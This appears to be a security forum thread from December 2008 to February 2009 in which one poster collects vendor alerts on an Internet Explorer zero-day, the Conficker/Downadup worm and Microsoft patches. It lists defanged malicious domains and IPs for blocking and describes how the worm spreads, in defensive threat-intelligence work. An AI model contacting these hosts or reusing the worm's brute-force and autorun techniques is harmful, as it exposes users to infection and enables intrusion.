2008-12-12, 13:56
FYI...

MSIE 0-day Spreading Via SQL Injection
- http://isc.sans.org/diary.html?storyid=5464
Last Updated: 2008-12-12 01:00:18 UTC

Full list of Injected Sites
- http://www.shadowserver.org/wiki/uploads/Calendar/sql-inj-list.txt
Last Updated: 12/11/08 12:05:32 -0400

IE7 0day expanded to include IE6 and IE8(beta)
- http://isc.sans.org/diary.html?storyid=5470
Last Updated: 2008-12-12 01:26:35 UTC

- http://securitylabs.websense.com/content/alerts.aspx
Date Description
12.12.2008 - ABIT China Web site Attacked by IE7 Zero Day
12.11.2008 - Taiwanese Search Engine, Look, Infected with IE 7 Zero Day

:fear::fear:

AplusWebMaster
2008-12-12, 17:47
Blocks...

- http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20081211
11 December 2008 - "...It turns out the domain that ISC is reported on is also dropping some pretty nasty malware. The domain "17gamo .com" is serving up the exploits which attempt to download malware from "www .steoo .com". Please do not visit either of these sites. If successful the exploits will install a Gh0st RAT on the system. This trojan is currently using the DNS name "evetlog .3322 .org" and is beaconing to tcp port 3020.
We recommend blocking or looking for traffic to all of the sites we list*... but in particular as it related to this threat the following:
www .17gamo .com - 207.154.202.219
www .steoo .com - 97.74.35.98
evetlog .3322 .org - 218.9.170.106 (was recently 123.165.49.135]
The IP addresses are of course subject to change, so we recommend resolving them when appropriate for traffic monitoring/blocking...."
* http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20081210
Updated 12/12/2008 - 14:17 UTC/GMT

:fear::fear:

AplusWebMaster
2008-12-14, 14:18
FYI...

IE7 0-Day Exploit Sites
- http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20081210
"...Shadowserver is aware of several hosts which are currently hosting exploit code designed to exploit this vulnerability. We would like to share this information so that it can be used for protection and detection. However, we strongly discourage visiting these sites for any reason. DO NOT visit the below sites as they are currently house live exploit code for the new IE7 0day exploit. The majority if not all of them also house several other exploits for different vulnerabilities as well...
vw. wd2a .cn - 218.83.161.134
927 .bigwww .com - 221.10.254.228
h3hs4 .cn - 218.6.12.75
...the first step you can take is to block the above domains and/or IP addresses. These sites are for the most part hosting a bunch of bad stuff and not just an IE7 exploit. However, there are certainly sites that we have missed and new ones that will pop up frequently, so this will not stop completely stop it all either. The only other real option against this exploit for now is an obvious one and that's to just not use IE7 until the issue has been resolved..."
Page last modified on December 14, 2008, at 01:13 AM <<<

:fear::fear:

AplusWebMaster
2008-12-15, 04:00
FYI...

IE7 0-Day Exploit Sites
- http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20081210
Updated 12/14/2008 - 18:26 UTC/GMT:
( additions - Shadowserver recommended blocklist updates )
buxhere .com - 203.169.184.78 / [country: HK]

Updated 12/15/2008 - 04:17 UTC/GMT
517wyt .com - 66.90.67.98 / [country: US]

Highly recommended that you NOT visit these sites. "The majority if not all of them also house several other exploits for different vulnerabilities as well"...

:fear:

AplusWebMaster
2008-12-15, 08:15
FYI... Shadowserver IEv7 0-day exploit sites / recommended blocklist sites...
Please do not visit -any- of these sites. The majority if not all of them also house several other exploits for different vulnerabilities as well...

- http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20081211
11 December 2008 - "...We recommend blocking or looking for traffic to all of the sites we list*... but in particular as it related to this threat the following:
www .17gamo .com - 207.154.202.219 *seen from SQL injection attacks*
www .steoo .com - 97.74.35.98
evetlog .3322 .org - 218.9.170.106 ..."

* http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20081210
Updated 12/16/2008 - 13:09 UTC/GMT

vw. wd2a .cn - 218.83.161.134
927 .bigwww .com - 221.10.254.228
h3hs4 .cn - 218.6.12.75

Updated 12/14/2008 - 18:26 UTC/GMT:
buxhere .com - 203.169.184.78 / [country: HK]

Updated 12/15/2008 - 04:17 UTC/GMT
517wyt .com - 66.90.67.98 / [country: US]

(Keep checking the Shadowserver URLs frequently for new updates)

:fear::fear::fear:

AplusWebMaster
2008-12-16, 22:55
FYI...

- http://isc.sans.org/diary.html?storyid=5497
Last Updated: 2008-12-16 20:23:07 UTC - "Microsoft has announced that they will be releasing an out of cycle security bulletin tomorrow for the IE zero day*..."
* http://www.microsoft.com/technet/security/bulletin/ms08-dec.mspx
December 16, 2008 - "...This bulletin advance notification will be replaced with the revised December bulletin summary on December 17, 2008. The revised bulletin summary will include the out-of-band security bulletin...
Bulletin Identifier: IE ...
Aggregate Severity Rating: Critical ..."

:fear:

AplusWebMaster
2008-12-17, 20:25
FYI...

Microsoft Security Advisory (961051)
Vulnerability in Internet Explorer Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/961051.mspx
December 17, 2008 - "Microsoft has completed the investigation into a public report of this vulnerability. We have issued MS08-078* to address this issue. For more information about this issue, including download links for an available security update, please review MS08-078. The vulnerability addressed is the Pointer Reference Memory Corruption Vulnerability - CVE-2008-4844**..."

** http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4844

> http://support.microsoft.com/?kbid=960714
Last Review: December 18, 2008 - Revision: 2.0

Microsoft Security Bulletin MS08-078 - Internet Explorer
Security Update for Internet Explorer (960714)
* http://www.microsoft.com/technet/security/bulletin/ms08-078.mspx
December 17, 2008
Severity Rating: Critical
Affected Software: Microsoft Windows, Internet Explorer...
Vulnerability Impact: Remote Code Execution...
(May require restart)

:fear:

AplusWebMaster
2008-12-23, 12:35
FYI...

Microsoft Security Advisory (961040)
Vulnerability in SQL Server Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/961040.mspx
December 22, 2008 - "Microsoft is investigating new public reports of a vulnerability that could allow remote code execution on systems with supported editions of Microsoft SQL Server 2000, Microsoft SQL Server 2005, Microsoft SQL Server 2005 Express Edition, Microsoft SQL Server 2000 Desktop Engine (MSDE 2000), Microsoft SQL Server 2000 Desktop Engine (WMSDE), and Windows Internal Database (WYukon). Systems with Microsoft SQL Server 7.0 Service Pack 4, Microsoft SQL Server 2005 Service Pack 3, and Microsoft SQL Server 2008 are not affected by this issue. Microsoft is aware that exploit code has been published on the Internet for the vulnerability addressed by this advisory. Our investigation of this exploit code has verified that it does not affect systems that have had the workarounds* listed below applied. Currently, Microsoft is not aware of active attacks that use this exploit code or of customer impact at this time. In addition, due to the mitigating factors for default installations of MSDE 2000 and SQL Server 2005 Express, Microsoft is not currently aware of any third-party applications that use MSDE 2000 or SQL Server 2005 Express which would be vulnerable to remote attack. However, Microsoft is actively monitoring this situation to provide customer guidance as necessary...
* Workarounds...
Deny permissions on the sp_replwritetovarbin extended stored procedure..."

- http://support.microsoft.com/kb/961040
December 23, 2008

- http://isc.sans.org/diary.html?storyid=5545
Last Updated: 2008-12-23 14:13:19 UTC
___

- http://www.microsoft.com/technet/security/advisory/961040.mspx
Updated: February 10, 2009 - "...We have issued MS09-004* to address this issue... The vulnerability addressed is the SQL Server sp_replwritetovarbin Limited Memory Overwrite Vulnerability
- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5416 ..."

* http://www.microsoft.com/technet/security/bulletin/ms09-004.mspx

:fear:

AplusWebMaster
2008-12-30, 21:03
FYI...

Microsoft Security Advisory (961509)
Research proves feasibility of collision attacks against MD5
- http://www.microsoft.com/technet/security/advisory/961509.mspx
December 30, 2008 - "Microsoft is aware that research was published at a security conference proving a successful attack against X.509 digital certificates signed using the MD5 hashing algorithm. This attack method could allow an attacker to generate additional digital certificates with different content that have the same digital signature as an original certificate. The MD5 algorithm had previously shown a vulnerability, but a practical attack had not yet been demonstrated. This new disclosure does not increase risk to customers significantly, as the researchers have not published the cryptographic background to the attack, and the attack is not repeatable without this information. Microsoft is not aware of any active attacks using this issue and is actively working with certificate authorities to ensure they are aware of this new research and is encouraging them to migrate to the newer SHA-1 signing algorithm. While this issue is not a vulnerability in a Microsoft product, Microsoft is actively monitoring the situation and has worked with affected Certificate Authorities to keep customers informed and to provide customer guidance as necessary...
Mitigating Factors...
• Most public Certificate Authority roots no longer use MD5 to sign certificates, but have upgraded to the more secure SHA-1 algorithm. Customers should contact their issuing Certificate Authority for guidance.
• When visited, Web sites that use Extended Validation (EV) certificates show a green address bar in most modern browsers. These certificates are always signed using SHA-1 and as such are not affected by this newly reported research...
Suggested Actions...
• Do not sign digital certificates with MD5
Certificate Authorities should no longer sign newly generated certificates using the MD5 algorithm, as it is known to be prone to collision attacks. Several alternative and more secure technologies are available, including SHA-1, SHA-256, SHA-384 or SHA-512.
Impact of action: Older hardware-based solutions may require upgrading to support these newer technologies...

:fear:

AplusWebMaster
2008-12-31, 19:00
FYI...

- http://isc.sans.org/diary.html?storyid=5596
Last Updated: 2008-12-31 14:26:41 UTC - "Symantec has identified W32.Downadup.B as a new worm that is spreading by taking advantage of the RPC vulnerability from MS08-067*. It does various things to install and hide itself on the infected computer. It removes any System Restore points that the user has set and disables the Windows Update Service. It looks for ADMIN$ shares on the local network and tries to brute force the share passwords with a built-in dictionary. At this point in time, the worm's purpose appears to be simply to spread and infect as many computers as possible. After January 1, 2009, it will try to reach out to a variety of web sites to pull down an updated copy of itself. You can find examples of the domain names in the Symantec W32.Downadup.B writeup**..."

Vulnerability in Server Service Could Allow Remote Code Execution (958644)
* http://www.microsoft.com/technet/security/Bulletin/ms08-067.mspx

** http://www.symantec.com/business/security_response/writeup.jsp?docid=2008-123015-3826-99&tabid=2

> http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4250

- http://secunia.com/advisories/32326
Last Update: 2008-10-24
Critical: Highly critical...

MS08-067 out-of-band netapi32.dll security update
- http://blogs.technet.com/swi/archive/2008/10/23/More-detail-about-MS08-067.aspx

- http://support.microsoft.com/?kbid=958644

- http://www.us-cert.gov/cas/techalerts/TA08-297A.html

:fear:

AplusWebMaster
2009-01-07, 06:51
FYI...

- http://preview.tinyurl.com/7jxs8z
01-06-2009 (Symantec blogs) - "... the most commonly infected systems appear to be Windows XP SP1 and earlier. Over 500,000 of the infected computers that contacted our server were running these operating system versions. Close behind was Windows XP SP2 and later systems. Windows 2000 and Windows 2003 had smaller shares. We believe that the W32.Downadup.A propagation routine has been very aggressive. It will continue to infect computers in the near future and receive updates via the aforementioned mechanism. Symantec discovered a new variant of this worm on December 30, 2008, dubbed W32.Downadup.B. This updated version contains additional propagation routines and what appears to be an altered domain generation routine. It’s not currently known if this new version was seeded to W32.Downadup.A infections or has independently spread through its own propagation routines.
We strongly encourage all users to ensure that the patches available in MS08-067 have been applied and that antivirus products are fully up-to-date to ensure that this threat does not find its way onto computers."
(Charts available at the URL above.)

:fear::mad::fear:

AplusWebMaster
2009-01-07, 15:16
FYI...

- http://www.f-secure.com/weblog/archives/00001574.html
January 6, 2009 - "Over the last (few) days, we've received reports of corporate networks getting infected with variants of MS08-067 worms. These are mostly Downadup/Conficker variants. The malware uses server-side polymorphism and ACL modification to make network disinfection particularly difficult. A sign of infection is that user accounts become locked out of an Active Directory domain as the worm attempts to crack account passwords using a built-in dictionary. When it fails, it leads to those accounts being locked. We have detailed information about the malware functionality in our Downadup.AL description*. We also have a separate tool available to assist in disinfecting. The tool is available from here**. We also recommend system administrators block access to web sites used by the worm..." (Long list available at the URL above.)

* http://www.f-secure.com/v-descs/worm_w32_downadup_al.shtml

** ftp://ftp.f-secure.com/anti-virus/tools/beta/f-downadup.zip

- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4250
Last revised: 11/21/2008
CVSS v2 Base Score: 10.0 (HIGH)

:fear::fear::mad:

AplusWebMaster
2009-01-09, 04:56
FYI...

- http://www.microsoft.com/technet/security/bulletin/ms09-jan.mspx
January 8, 2009 - "This is an advance notification of (a) security bulletin that Microsoft is intending to release on January 13, 2009... (1)

Windows Bulletin
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software:
Microsoft Windows 2000 SP4, XPSP2, XPSP3, Server 2003 - Critical
Vista SP1, Server 2008 - Moderate

.

AplusWebMaster
2009-01-09, 21:20
FYI...

Downadup Blocklist
- http://www.f-secure.com/weblog/archives/00001577.html
January 9, 2009 - "Our post on Tuesday included a list of domains used by the Downadup worm. Today's list includes 1,500 additional sites used by the worm*."
* http://www.f-secure.com/weblog/archives/downadup_domain_blocklist.txt

:fear::fear:

AplusWebMaster
2009-01-10, 03:16
More...

New variants of W32.Downadup.B find new ways to propagate
- http://preview.tinyurl.com/ay432s
01-09-2009 Symantec Security Response Blog - "Symantec has observed an increase in infections relating to W32.Downadup over the holiday period and is urging organizations to apply the patch for Microsoft Windows Server Service RPC Handling Remote Code Execution Vulnerability (MS08-067) as soon as possible. A new variant of this threat, called W32.Downadup.B, appeared on December 30th and can not only propagate by exploiting the Microsoft Windows Server Service RPC Handling Remote Code Execution Vulnerability, but can also spread through corporate networks by infecting USB sticks and accessing weak passwords... W32.Downadup.B creates an autorun.inf file on all mapped drives so that the threat automatically executes when the drive is accessed. The threat then monitors for drives that are connected to the compromised computer in order to create an autorun.inf file as soon as the drive becomes accessible. The worm also monitors DNS requests to domains containing certain strings and blocks access to those domains so that it will appear that the network request timed out. This means infected users may not be able to update their security software from those websites. This can be problematic as worm authors generally dish out new variants constantly... Click here** to obtain more information about how to prevent a threat from spreading using the "AutoRun" feature... more detail on the evolution and infection statistics of this threat, check out the earlier Security Response blog posting*..."
W32.Downadup Infection Statistics
* http://preview.tinyurl.com/7jxs8z
01-06-2009 - "...graph shows the statistics, over a 72-hour period, of unique IP addresses versus unique IP address and user-agent pairs..."

** http://service1.symantec.com/SUPPORT/ent-security.nsf/docid/2008032111570648

:fear::fear::fear:

AplusWebMaster
2009-01-13, 14:37
FYI...

Preemptive Downadup Domain Blocklist, Jan. 13-16
- http://www.f-secure.com/weblog/archives/00001578.html
January 12, 2009 - "Downadup variants use algorithmically determined URLs to report back to the bad guys. Reverse engineering the worm's code provides us with the method to predict which domains may be used in the future. Today's preemptive blocklist* includes an additional 1,000 URLs that WILL BE used by the Downadup from the 13th to the 16th. Network administrators can use this list as a preventive measure."
* http://www.f-secure.com/weblog/archives/downadup_domain_blocklist_13_16.txt

- http://isc.sans.org/diary.html?storyid=5671
Last Updated: 2009-01-12 22:43:54 UTC

- http://www.fortiguardcenter.com/reports/MS08-067-Conficker.html
(MS08-067 exploit activity from October 2008 to January 2009...) graphic

:fear::fear:

AplusWebMaster
2009-01-13, 20:26
FYI...

- http://www.microsoft.com/technet/security/Bulletin/MS09-jan.mspx
January 13, 2009 - "This bulletin summary lists security bulletin.. released for January 2009... (-1-)

Microsoft Security Bulletin MS09-001
Vulnerabilities in SMB Could Allow Remote Code Execution (958687)
- http://www.microsoft.com/technet/security/bulletin/ms09-001.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software:
Microsoft Windows 2000 SP4, XPSP2, XPSP3, Server 2003 - Critical
Vista SP1, Server 2008 - Moderate
___

ISC Analysis
- http://isc.sans.org/diary.html?storyid=5677
Last Updated: 2009-01-13 18:15:14 UTC
___

- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4114
- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4834
- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4835
___

MS09-001: Prioritizing the deployment of the SMB bulletin
- http://preview.tinyurl.com/8elasn
(MS Security Vulnerability Research & Defense blog) - "...In terms of prioritizing the deployment of this update, we recommend updating SMB servers and Domain Controllers immediately since a system DoS would have a high impact. Other configurations should be assessed based on the role of the machine. For example, non-critical workstations could be considered lower priority assuming a system DoS is an acceptable risk. Systems with SMB blocked at the host firewall could also be updated more slowly..."
___

MSRT - Jan.2009 additions...
- http://support.microsoft.com/?kbid=890830
Malicious software family Tool version Current severity rating
Win32/Banload - January 2009 (V 2.6) Moderate
Win32/Conficker* - January 2009 (V 2.6) High ...
* http://www.microsoft.com/security/portal/Entry.aspx?Name=Win32%2fConficker
(aka - Downadup)

Download:
- http://preview.tinyurl.com/6bb67
File Name: windows-kb890830-v2.6.exe
Version: 2.6
Date Published: 1/13/2009
___

- http://www.f-secure.com/weblog/archives/00001579.html
January 13, 2009 11:21 GMT - "... final count is: 2,395,963 infections worldwide. This figure is conservative; the real number is certainly higher."
- http://www.f-secure.com/weblog/archives/00001580.html
January 14, 2009 - "...worldwide Downadup infection count... Today's total infection count is an estimated 3,521,230 infections worldwide. That's over one million new infections since yesterday (and we still consider this to be a conservative estimate)."

:fear:

AplusWebMaster
2009-01-16, 01:14
FYI...

- http://preview.tinyurl.com/9fc4ze
January 15, 2009 (Computerworld) - "The worm that has infected several million Windows PCs is causing havoc because nearly a third of all systems remain unpatched 80 days after Microsoft Corp. rolled out an emergency fix, a security expert said today. Based on scans of several hundred thousand customer-owned Windows PCs, Qualys Inc.* concluded that about 30% of the machines have not yet been patched with the "out of cycle" fix Microsoft provided Oct. 23 as security update MS08-067..."
* http://www.qualys.com/research/alerts/view.php/2008-10-23

- http://preview.tinyurl.com/8tr9fg
January 15, 2009 (Avert Labs) - "...While investigating we found that this worm has an exploit for the recent MS08-067 vulnerability and uses the exploitation method derived from the metasploit ms08_067_netapi module to spread itself..."

NOTES:
1. It appears that this could, in part, be due to an MS Update site problem of a sort. MS08-067 was NOT offered on an XPSP2 system during the monthly update for Nov'08, nor during both of the Dec'08 runs (including the check/update for the IE 0-day fix). MS08-067 appears to have been installed during an XPSP3 update from the MS Update site just before year-end. YMMV.
2. A second XPSP2 machine - checked ReportingEvents.log located in %windir%\SoftwareDistribution ... found MS08-067 (KB958644) installed 10.23.2008, but dates shown in >Control Panel >Add/Remove programs show KB958644 install date occurred when XPSP3 was installed at year-end. WTF.

:fear: :sad: :spider:

AplusWebMaster
2009-01-16, 19:28
FYI...

- http://www.f-secure.com/weblog/archives/00001584.html
January 16, 2009 - "The number of Downadup infections are skyrocketing based on our calculations. From an estimated 2.4 million infected machines to over 8.9 million during the last four days. That's just amazing. We've received a number of queries on just how exactly we're producing our estimates. There's been interest from Internet operators, CERTs, and fellow antivirus researchers. There's also been several posts to our blog comments, doubting our numbers... So let us explain how we are generating the numbers. There are several different variants of Downadup out there. The algorithm to create the domain names vary a bit between the variants. We've been tracking the variant we believe to be most common. It creates 250 possible domains each day. We've registered some selected domains out of this pool and are monitoring the connections being made to them... We first tried to count unique User-Agent headers per IP address, but the results weren't very good as in a standardized corporate network, most machines have identical User-Agents. So, with a little digging we discovered that in the /search/q=NUMBER query, the number is not random. It's basically a global variable in the code, getting incremented (thread-safely through InterlockedIncrement) every time the malware has successfully exploited a machine via MS08-067*. The incrementation is done in the httpd thread of the malware, after it has exploited a machine successfully. So this number tells us how many other computers this machine has exploited since it was last restarted... We wrote a program that parses the logs, extracting the highest "q" value for the IP/User-Agent pairs. These are then added together to get our figures. As you can see now, they are very conservative. And they are showing more than 8 million infected machines right now. The situation with Downadup is not getting better. It's getting worse."
(Complete detail shown at the F-secure URL above.)

* http://www.microsoft.com/technet/security/Bulletin/ms08-067.mspx

:fear: :sad: :fear:

AplusWebMaster
2009-01-20, 18:19
FYI...

- http://blog.trendmicro.com/the-mess-that-is-worm_downad/
Jan. 20, 2009 - "The North American region has the most number of infected PCs, with users from the United States being hit the most. Japan, China, and Taiwan are also major DOWNAD-affected countries. In Europe, Italy and Spain had the most infections however other countries have also been affected. Users observe the following symptoms when they are infected with WORM_DOWNAD.AD:
• Blocked access to antivirus-related sites
• Disabled services such as Windows Automatic Update Service
• High traffic on affected system’s port 445
• Hidden files even after changes in Folder Options
• Inability to log in using Windows credentials because they are locked out
A .DLL file with random file names and autorun.inf also appear in all mapped drives, and in Internet Explorer and Movie Maker folders under the Program Files directory. The worm locks its dropped copy to prevent users from reading, writing, and deleting the malicious file. It also makes several registry changes to allow simultaneous network connections. By re-infecting machines, this worm manages to keep its malicious activities going on... Patching systems and programs as soon as fixes are made available and disabling autorun* are two of the most important actions required to reduce the risk of infection, infection propagation or reinfection with variant updates..."
(Global map of infections available at the URL above.)

NoDriveTypeAutoRun
* http://www.microsoft.com/technet/prodtechnol/windows2000serv/reskit/regentry/93502.mspx?mfr=true

:fear:

AplusWebMaster
2009-01-22, 14:28
FYI...

Inauguration Themed Waledac - New Tactics & New Domains
- http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20090119
January 19, 2009 - "...the Inauguration of Barack Obama and the Waledac trojan has been in full swing attempting to take advantage of the event. Since late last week the trojan has been blasting its way across the Internet with e-mails attempting to bring unwitting users to a page that looks a lot like the official Barack Obama website. The page is updated each day to appear to have a new blog entry... As always do NOT visit these domains as they are malicious and hosting exploit code... Click here* for a full listing of Waledac domains that we are aware of - this link will be updated as we get them. Your best bet is to block these domains or otherwise avoid them..."
* http://www.shadowserver.org/wiki/uploads/Calendar/waledac_domains.txt

:fear:

AplusWebMaster
2009-01-23, 18:21
FYI...

MS patch needs to be installed manually to disable -Autorun- on W2K, XP, and W2K3.
- http://preview.tinyurl.com/ck79cs
January 22, 2009 (Computerworld) - "...US-CERT said that most Windows users would have to manually go to Microsoft's Web site to grab the KB953252* update. "Note that this fix has been released via [Windows] Update to Windows Vista and Server 2008 systems as part of the MS08-038 Security Bulletin," said the security organization, talking about a July 2008 patch. "Windows 2000, XP and Server 2003 users must install the update manually." Microsoft has -not- issued the KB953252 update to Windows 2000, XP or Server 2003 systems via Windows Update or the corporate-oriented Windows Server Update Services (WSUS). US-CERT confirmed that the KB653252 update -does- fix the bug it had pointed out the day before**. "Our testing has shown that installing this update -and- setting the NoDriveTypeAutoRun registry value to 0xFF -will- disable Autorun," said US-CERT..."

* http://support.microsoft.com/kb/953252

** http://www.us-cert.gov/cas/techalerts/TA09-020A.html
Last revised: January 21, 2009: Added reference and details for Microsoft KB953252

- http://www.secureworks.com/research/threats/downadup-removal/
"...F-Secure also has a removal tool available, however the f-secure.com domain is in the blocked list of domain names (per infection)... Using an IP address instead of the hostname will bypass the worm's blocking routines, so that tool could be downloaded by infected systems at this URL: ftp://193.110.109.53/anti-virus/tools/beta/f-downadup.zip ..."

:fear: :rolleyes:

AplusWebMaster
2009-01-27, 17:25
FYI...

- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0243
Last revised:01/22/2009
CVSS v2 Base Score:7.2 (HIGH)
Overview: Microsoft Windows does not properly enforce the Autorun and NoDriveTypeAutoRun registry values, which allows physically proximate attackers to execute arbitrary code...

- http://www.us-cert.gov/cas/techalerts/TA09-020A.html
Last revised: January 21, 2009

- http://isc.sans.org/diary.html?storyid=5695
Last Updated: 2009-01-15 08:38:46 UTC

:fear:

AplusWebMaster
2009-01-30, 19:07
FYI...

Preemptive Downadup blocklist for February 2009
- http://www.f-secure.com/weblog/archives/00001593.html
January 30, 2009 - "... new list of potential domains for the month of February. The list reflects what we think to be the most common variant of Downadup in-the-wild..."
* http://www.f-secure.com/weblog/archives/Downadup_Domain_Blocklist_February.txt

:fear::mad::fear:

AplusWebMaster
2009-02-04, 00:23
FYI...

Microsoft Security Bulletin MS08-037 – Important
Vulnerabilities in DNS Could Allow Spoofing (953230)
- http://www.microsoft.com/technet/security/bulletin/ms08-037.mspx
Published: July 8, 2008
...Why was this security bulletin revised on January 13, 2009?
Microsoft revised this bulletin to communicate that the update offered by this bulletin may -not- have been correctly offered to all systems running Windows XP SP3. The detection and deployment issue has been fixed, and customers with Windows XP Service Pack 3 systems who have not already applied the update from this bulletin will now be correctly offered the update...
• V2.3 (January 13, 2009): Added a new entry to the Frequently Asked Questions (FAQ) Related to This Security Update section to communicate the fix to a detection and deployment issue with Windows XP Service Pack 3. There were no changes to the binaries or packages for this update. Customers who have successfully updated their systems do not need to reinstall this update.

Ed. note: 'Makes one wonder if the same was true for MS08-067...

:sad:

AplusWebMaster
2009-02-06, 02:24
FYI...

- http://www.microsoft.com/technet/security/bulletin/ms09-feb.mspx
February 5, 2009 - "This is an advance notification of security bulletins that Microsoft is intending to release on February 10, 2009...
(Total of -4-)

Internet Explorer
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows, Internet Explorer

Microsoft Exchange Server
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Does not require restart

Microsoft SQL Server
Maximum Severity Rating: Important
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart

Microsoft Office - Visio
Restart Requirement: Important
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart

:spider:

AplusWebMaster
2009-02-07, 09:53
FYI...

Protect Your Network from Conficker
- http://technet.microsoft.com/en-us/security/dd452420.aspx
February 6, 2009 - "This page aims to help customers by providing consolidated information about Conficker that customers can use to protect their systems and with which to recover systems that have been infected..."

("Related Links" also available at the URL above.)

:fear:

AplusWebMaster
2009-02-08, 14:37
FYI...

OpenDNS to roll out Conficker tracking - blocking
- http://www.theregister.co.uk/2009/02/07/opendns_conficker_protection/
7 February 2009 21:32 GMT - "With an estimated 10 million PCs infected by the stealthy worm known as Conficker, it's a good bet that plenty of administrators are blissfully unaware that their networks are playing host to the pest. Now, a free service called OpenDNS* is offering a new feature designed to alert administrators to the damage and help them contain it.
The company on Monday plans to introduce an addition to its offerings that makes it easy for admins to know if even a single machine has been infected by Conficker. The service will also automatically protect infected machines by preventing them from connecting to rogue servers controlled by the malware authors... Without the service, admins would have to manually block 1,750 domains each week, or 91,250 each year. The service will also help network admins to quickly pinpoint any infected machines by checking their OpenDNS Dashboard. Starting Monday, any networks with PCs that try to connect to the Conficker addresses will be flagged on an admin's private statistics page. The service is available for free to both businesses and home users... The service is first offered under a new botnet protection service being rolled out by OpenDNS... The list of blocked domains is being provided by anti-virus provider Kaspersky, which reverse-engineered Conficker so it could preemptively predict the new sites that will be used each day."
* https://www.opendns.com/homenetwork/start/

- http://blog.opendns.com/2009/02/09/stats-are-back-and-conficker/
Feb 9, 2009

- http://www.shadowserver.org/wiki/pmwiki.php?n=Stats.Sinkholes
February 16, 2009

:bigthumb:

AplusWebMaster
2009-02-10, 20:57
FYI...

- http://www.microsoft.com/technet/security/bulletin/ms09-feb.mspx
February 10, 2009 - "This bulletin summary lists security bulletins released for February 2009... (-4-)

Critical -2-

Microsoft Security Bulletin MS09-002
Cumulative Security Update for Internet Explorer (961260)
- http://www.microsoft.com/technet/security/bulletin/ms09-002.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows, Internet Explorer

Microsoft Security Bulletin MS09-003
Vulnerabilities in Microsoft Exchange Could Allow Remote Code Execution (959239)
- http://www.microsoft.com/technet/security/bulletin/ms09-003.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Exchange Server

Important -2-

Microsoft Security Bulletin MS09-004
Vulnerability in Microsoft SQL Server Could Allow Remote Code Execution (959420)
- http://www.microsoft.com/technet/security/bulletin/ms09-004.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft SQL Server
- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5416
Last revised:02/12/2009
CVSS v2 Base Score: 9.0 (HIGH)

Microsoft Security Bulletin MS09-005
Vulnerabilities in Microsoft Office Visio Could Allow Remote Code Execution (957634)
- http://www.microsoft.com/technet/security/bulletin/ms09-005.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Office
___

ISC Analysis
- http://isc.sans.org/diary.html?storyid=5836
Last Updated: 2009-02-10 18:59:20 UTC

.

AplusWebMaster
2009-02-11, 13:06
FYI...

MS Security Bulletin MS08-070 - Critical
Vulnerabilities in Visual Basic 6.0 Runtime Extended Files (ActiveX Controls) Could Allow Remote Code Execution (932349)
- http://www.microsoft.com/technet/security/Bulletin/ms08-070.mspx
Updated: February 10, 2009 - This security update resolves five privately reported vulnerabilities and one publicly disclosed vulnerability in the ActiveX controls for the Microsoft Visual Basic 6.0 Runtime Extended Files. These vulnerabilities could allow remote code execution if a user browsed a Web site that contains specially crafted content. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights...

...Further details can be found in the security release issued by Akamai:
- http://www.akamai.com/html/support/security.html

...Further details can be found in the security release issued by RIM:
- http://www.blackberry.com/btsc/search.do?cmd=displayKC&docType=kc&externalId=KB16248

• V1.2 (February 10, 2009): Clarified the class IDs for two ActiveX controls.
First, listed a second class ID in the workaround, "Prevent Windows Common AVI ActiveX Control from running in Internet Explorer," for CVE-2008-4255.
Second, listed in the section, Frequently asked questions (FAQ) related to this security update, the class ID for the Winsock Control for which the kill bit is being set as a security-related change to functionality in this update. This is an informational change only. There were no changes to the security update files in this bulletin.

//

Microsoft Security Advisory (960715)
Update Rollup for ActiveX Kill Bits
- http://www.microsoft.com/technet/security/advisory/960715.mspx
Published: February 10, 2009 - "Microsoft is releasing a new set of ActiveX kill bits with this advisory. The update includes kill bits for previously published Microsoft security bulletins:
• MS08-070 - Critical
Vulnerabilities in Visual Basic 6.0 Runtime Extended Files (ActiveX Controls) Could Allow Remote Code Execution (932349)
- http://www.microsoft.com/technet/security/Bulletin/ms08-070.mspx
For more information about installing this update, see:
Update Rollup for ActiveX Kill Bits
- http://support.microsoft.com/kb/960715
February 10, 2009

:fear:

AplusWebMaster
2009-02-12, 05:16
FYI...

MSRT February 2009 - Win32/Srizbi
- http://preview.tinyurl.com/d59enk
